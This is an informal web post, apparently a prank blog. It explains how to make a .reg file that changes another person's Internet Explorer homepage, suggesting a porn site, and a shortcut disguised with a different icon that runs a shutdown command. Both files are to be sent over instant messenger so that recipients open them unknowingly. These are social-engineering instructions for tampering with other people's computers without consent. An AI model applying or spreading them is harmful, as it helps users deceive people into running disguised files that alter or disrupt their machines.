If you want to prank someone, this Internet Explorer homepage hack is great! It changes the start page/homepage of your friend's or anyone you'd like to prank.
System administrators will almost always set the default home page for the browser to the corporate website or intranet when building a machine. This is just a small registry hack that will set the home page for IE6 or IE7. You could probably use this in a logon script to set to home page on all users when they login to the network. How? here it is.
Steps:
1. Open Notepad (start - all programs - accessories - notepad)
2. Copy and paste this:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.johnlawrence.tk/"
3. Change the "http://www.johnlawrence.tk/" to the website you want to be the homepage of your friend. For example, change it to http://www.thisisporn.com/ :)
4. Click the File - Save As (at the top, notepad)
5. Save it as the name you want, but with the .reg extension. For example, Nice File.reg, and also make sure that it's set to All Files. At the dropdown menu, not text document!
6. Click Save (save it to your desktop)
7. Now just send it via Yahoo Messenger or AIM.
And when your friend opens it, his/her homepage will be changed..

Do you have any friend that you hate the most? Or just a friend you wanna joke with.
If you do, this is a good idea to prank your friend!
Using this shourtcut icon which you can easily make.
And when the open it up... shutting down. haha
How to do the Prank!
1. First make sure you're friend doesn't have any important work that is not saved yet. Shutting down a computer with works not saved can cause problems!
2. Right click on your desktop and choose NEW and then SHOUTCUT.
(that's new --> shourtcut)
3. Now type in: shutdown -s -t 10 -c "Sorry but Windows is Shutting Down! :D"
4. Click next and name it anything you want
5. Now after creating it, right click on it and click properties, now choose change icon, choose from the icon list (anything you want) and then click ok.
6. Now just send it to a friend using either Yahoo Messenger or AIM.
